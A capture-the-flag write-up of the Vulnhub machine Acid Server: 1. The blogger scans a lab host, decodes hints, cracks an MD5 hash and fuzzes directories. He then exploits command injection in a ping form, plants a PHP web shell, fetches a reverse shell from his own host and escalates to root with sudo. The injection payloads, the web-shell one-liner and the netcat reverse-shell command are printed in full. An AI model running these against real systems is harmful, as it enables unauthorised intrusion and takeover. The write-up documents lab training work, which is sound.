Acid … just say NO to drugs!
If you follow @Vulnhub you would have noticed that there has recently been quite a few new vulnerable boot2root machines released. Needless to say, you know what time it is… It’s boot2root CTF time!
Introducing Acid Server: 1 by @m_avinash143.
Welcome to the world of Acid.
Fairy tails uses secret keys to open the magical doors.
Goal: Escalate the privileges to root and capture the flag. Once anyone able to beat the machine then please let me know.
In my previous write-ups you would have noticed I always start out by running netdiscover to find the IP address of the challenge host. Well, I’m starting to get lazy so now I give all my challenge machines the same MAC address and DHCP lease…. “Save the planet; don’t waste white space”. ;)
Let’s find what ports are open or listening:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
xerubus@omerta:~$ sudo nmap -sT -Pn -p- -A --script vuln 192.168.77.54 -v ---snip--- Scanning 192.168.77.54 [65535 ports] Discovered open port 33447/tcp on 192.168.77.54 Completed Connect Scan at 11:50, 2.93s elapsed (65535 total ports) Initiating Service scan at 11:50 Scanning 1 service on 192.168.77.54 Completed Service scan at 11:50, 11.02s elapsed (1 service on 1 host) Initiating OS detection (try #1) against 192.168.77.54 NSE: Script scanning 192.168.77.54. Initiating NSE at 11:50 NSE Timing: About 93.02% done; ETC: 11:57 (0:00:30 remaining) NSE Timing: About 93.02% done; ETC: 11:58 (0:00:32 remaining) NSE Timing: About 93.02% done; ETC: 11:58 (0:00:35 remaining) NSE Timing: About 93.02% done; ETC: 11:59 (0:00:37 remaining) Completed NSE at 11:58, 510.64s elapsed Nmap scan report for 192.168.77.54 Host is up (0.00048s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 33447/tcp open http Apache httpd 2.4.10 ((Ubuntu)) ---snip--- |
Okay… http open at port 33447. Time to take a look in a browser:
Secret keys and fairy tails (tales sp?).. sounds cool. Viewing the source has an interesting comment on line 76: 0x643239334c6d70775a773d3d
Looks like hex to me, which, once converted then looks like it’s base64 encoded. Let’s decode both:
|
1 2 |
xerubus@omerta:~$ echo 0x643239334c6d70775a773d3d | xxd -r -p | base64 -d ; echo wow.jpg |
If you look at the source code you will notice that images are stored in /images/. Let’s see if our wow.jpg gives us any clues:
Nothing overly exciting. Let’s grab the image and run strings over it.
|
1 2 3 4 5 6 7 |
xerubus@omerta:~$ strings wow.jpg GIF89a """%%%)))///333777999>>>@@@DDDKKKOOORRRUUU[[[^^^cccfffkkknnnssswwwxxx~~~ 8rU: ---snip--- ;37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34 xerubus@omerta:~$ |
A couple of things to take note of… Firstly, the image is not a jpg, it is a gif. Secondly, the last line looks like it could be some hex.
|
1 2 |
xerubus@omerta:~$ echo 3761656530663664353838656439393035656533376631366137633631306434 | xxd -r -p ; echo 7aee0f6d588ed9905ee37f16a7c610d4 |
Let’s use hash-identifier to work out what hash we are playing with:
|
1 2 3 4 5 6 7 |
xerubus@omerta:~$ echo 7aee0f6d588ed9905ee37f16a7c610d4 | hash-identifier ---snip--- ------------------------------------------------------------------------- HASH: Possible Hashs: [+] MD5 |
And last but not least, we’ll push the MD5 hash through hashcat:
|
1 2 |
xerubus@omerta:~$ hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --quiet 7aee0f6d588ed9905ee37f16a7c610d4:63425 |
63425 means nothing to me at the moment, so let’s just move on. Did you notice the title of the default webpage? /Challenge. Let’s try it before we start fuzzing the webserver.
We’re greeted with a page welcoming us to hell; how nice. After spending a bit of time trying usual credentials and attempting SQL injection, I decided to fuzz the webserver:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
xerubus@omerta:~$ wfuzz -c -z file,/usr/share/dirb/wordlists/big.txt --hc 404 http://192.168.77.54:33447/Challenge/FUZZ.php ******************************************************** * Wfuzz 2.0 - The Web Bruteforcer * ******************************************************** Target: http://192.168.77.54:33447/Challenge/FUZZ.php Payload type: file,/usr/share/dirb/wordlists/big.txt Total requests: 20469 ================================================================== ID Response Lines Word Chars Request ================================================================== 00013: C=403 11 L 32 W 314 Ch " - .htaccess" 00015: C=403 11 L 32 W 314 Ch " - .htpasswd" 03963: C=200 17 L 33 W 496 Ch " - cake" 07060: C=200 12 L 27 W 309 Ch " - error" 09550: C=302 0 L 0 W 0 Ch " - include" 09560: C=200 40 L 80 W 1333 Ch " - index" |
cake.php doesn’t help us out too much, but it does have an interesting title; /Magic_Box:
Browsing the /Challenge/Magic_Box path gives us a permission denied warning, so there may be something interesting around… let’s try fuzzing it:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
xerubus@omerta:~$ wfuzz -c -z file,/usr/share/dirb/wordlists/big.txt --hc 404 http://192.168.77.54:33447/Challenge/Magic_Box/FUZZ.php ******************************************************** * Wfuzz 2.0 - The Web Bruteforcer * ******************************************************** Target: http://192.168.77.54:33447/Challenge/Magic_Box/FUZZ.php Payload type: file,/usr/share/dirb/wordlists/big.txt Total requests: 20469 ================================================================== ID Response Lines Word Chars Request ================================================================== 00015: C=403 11 L 32 W 324 Ch " - .htaccess" 00017: C=403 11 L 32 W 324 Ch " - .htpasswd" 04959: C=200 17 L 54 W 594 Ch " - command" 11145: C=200 0 L 0 W 0 Ch " - low" |
Let’s take a look at command.php:
Ohhhh… enter a host to ping you say? Is anyone else thinking remote command execution? Let’s intercept the POST and response in burpsuite and see what we get:
Nice! Possible command execution right there. Let’s give it a try:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
xerubus@omerta:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://192.168.77.54:33447/Challenge/Magic_Box/command.php' HTTP/1.1 200 OK Date: Tue, 25 Aug 2015 02:02:55 GMT Server: Apache/2.4.10 (Ubuntu) Vary: Accept-Encoding Content-Length: 608 Content-Type: text/html; charset=UTF-8 www-data </br><!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <link rel="stylesheet" href="../css/style.css"> <link rel="stylesheet" href="../styles/main.css" /> <title>Reverse Kunfu</title> </head> <body> <div class="wrapper"> <div class="container"> <p> <h1>You are 1337 Hax0r. Keep your patiene and proceed further.</h1> <br> <form method="post" action=""> Enter the Host to Ping:<input name="IP" placeholder="IP ADDRESS" type="text" id="IP" maxlength="200"> <input name="submit" type="submit" id="submit" value="submit"> </body> </html> |
Well hello www-data! At this point I tried the obvious next step, a reverse shell… ;nc -e /bin/sh 192.168.77.55 1337; no joy unfortunately.
I then tried to use wget to grab a php shell from my server; again.. no luck. I then thought about echo’ing out a php one liner to create simple php script; again.. no luck.
Hmm… perhaps I don’t have the correct permissions to write as the www-data user. A quick ls -al of my current location showed that I can write one directory down. Let’s try the php one liner again. :)
|
1 2 |
xerubus@omerta:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://192.168.77.54:33447/Challenge/Magic_Box/command.php' HTTP/1.1 200 OK |
Seems okay. Let’s test it:
|
1 2 |
xerubus@omerta:~$ curl http://192.168.77.54:33447/Challenge/shell.php?cmd=id uid=33(www-data) gid=33(www-data) groups=33(www-data) |
BAM! We have a command shell. Let’s do it properly this time and put a reverse PHP shell on the server:
|
1 |
http://192.168.77.54:33447/Challenge/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http://192.168.77.55/phpshell.txt%22,%20%27r%27%29%29;%27 |
Execute the new phpshell.php and it’s reverse shell time:
|
1 2 3 4 5 6 7 8 9 10 11 |
xerubus@omerta:~$ nc -nvlp 1337 nc: listening on :: 1337 ... nc: listening on 0.0.0.0 1337 ... nc: connect to 192.168.77.55 1337 from 192.168.77.54 37414 Linux acid 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:01 UTC 2015 i686 i686 i686 GNU/Linux 12:38:41 up 3:02, 0 users, load average: 0.00, 0.02, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ hostname acid |
Time to enumerate the host. I checked for the usual suid binaries, world writeable files and directories, log files, etc etc etc. /etc/passwd contained the following users of interest, however permissions stop me from finding anything useful.
|
1 2 3 4 5 6 |
www-data@acid:/$ cat /etc/passwd ---snip--- whoopsie:x:109:118::/nonexistent:/bin/false acid:x:1000:1000:acid,,,:/home/acid:/bin/bash ---snip--- saman:x:1001:1001:,,,:/home/saman:/bin/bash |
It was almost time to be lazy and use one of the automated linux privilege check scripts, until I saw it…. /s.bin … that’s not part of a normal tree. Taking a look at the contents reveals one single php file:
|
1 2 3 4 |
www-data@acid:/s.bin$ cat investigate.php <?php echo "Now you have to behave like an investigator to catch the culprit\n"; ?> |
A taunt… I continue to rummage around the system looking for clues or anything else odd. Getting even closer to running an automated script, I come across a recently modified directory in /sbin, which once again isn’t a directory I have noticed before.
|
1 2 3 4 5 6 7 8 9 |
www-data@acid:/sbin$ ls -altr total 9660 -rwxr-xr-x 1 root root 2251 Dec 2 2009 on_ac_power -rwxr-xr-x 1 root root 9688 May 3 2012 iwspy -rwxr-xr-x 1 root root 13804 May 3 2012 iwpriv ---snip--- drwxr-xr-x 2 root root 4096 Aug 7 17:46 raw_vs_isi drwxr-xr-x 23 root root 4096 Aug 8 11:00 .. drwxr-xr-x 3 root root 12288 Aug 8 11:58 . |
… and upon closer inspection we find a capture file.
|
1 2 3 4 5 6 7 8 |
www-data@acid:/sbin/raw_vs_isi$ ls -al total 816 drwxr-xr-x 2 root root 4096 Aug 7 17:46 . drwxr-xr-x 3 root root 12288 Aug 8 11:58 .. -rwxr--r-- 1 acid acid 818744 Aug 7 16:09 hint.pcapng www-data@acid:/sbin/raw_vs_isi$ file hint.pcapng hint.pcapng: pcap-ng capture file - version 1.0 |
A quick symlink to our writeable web directory and we can take a look at the capture file on our attacking machine.
Using strings, we come across something interesting…..
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
xerubus@omerta:~$ strings hint.pcapng | more Linux 3.18.0-kali3-686-pae Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10) eth0 Linux 3.18.0-kali3-686-pae wpad wpad FHFAEBEECACACACACACACACACACACAAA EJFDEBFEEBFACACACACACACACACACAAA isatap isatap ---snip--- FHFAEBEECACACACACACACACACACACAAA grWhat was the name of the Culprit ??? ---snip--- |
Taking a look at the capture file with tcpdump we find that the string comes from a conversation over port 1337. Let’s use tcpick to find all 1337 traffic and to tidy up the output:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
xerubus@omerta:~$ tcpick -C -yP -r hint.pcapng "port 1337" Starting tcpick 0.2.1 at 2015-08-24 17:39 AEST Timeout for connections is 600 tcpick: reading from hint.pcapng setting filter: "port 1337" 1 SYN-SENT 192.168.0.44:38476 > 192.168.0.46:1337 1 SYN-RECEIVED 192.168.0.44:38476 > 192.168.0.46:1337 1 ESTABLISHED 192.168.0.44:38476 > 192.168.0.46:1337 heya hello What was the name of the Culprit ??? saman and now a days he's known by the alias of 1337hax0r oh...Fuck....Great...Now, we gonna Catch Him Soon :D Yes .. We have to !! The mad bomber is on a rage Ohk...cya Over and Out 1 FIN-WAIT-1 192.168.0.44:38476 > 192.168.0.46:1337 1 TIME-WAIT 192.168.0.44:38476 > 192.168.0.46:1337 1 CLOSED 192.168.0.44:38476 > 192.168.0.46:1337 tcpick: done reading from hint.pcapng |
According to the conversation, our culprit is saman, who we know has a user account on acid. Could his alias of 1337hax0r also be his password?
|
1 2 3 4 |
www-data@acid:/var/www/html/Challenge$ su - saman su - saman Password: 1337hax0r saman@acid:~$ |
Yes.. yes it could. Does saman have any sudo privileges?
|
1 2 3 4 5 6 7 8 |
saman@acid:~$ sudo -l Matching Defaults entries for saman on acid: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User saman may run the following commands on acid: (ALL : ALL) ALL |
Yes.. he certainly does. Root.. here we come!
|
1 2 3 4 |
saman@acid:~$ sudo bash root@acid:~# hostname ; id acid uid=0(root) gid=0(root) groups=0(root) |
… and it’s time to raise the flag!
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
root@acid:~# cd /root root@acid:/root# ls flag.txt root@acid:/root# cat flag.txt Dear Hax0r, You have successfully completed the challenge. I hope you like it. FLAG NAME: "Acid@Makke@Hax0r" Kind & Best Regards -ACID facebook: https://facebook.com/m.avinash143 |
THE END. Acid was fun, but remember kids…. “Just say no to drugs”.
Thanks for the Acid Server: 1 boot2root @m_avinash143.
Thank you like always @Vulnhub and @g0tmi1k for hosting such awesome challenges.
Until next time, tight lines and happy hacking.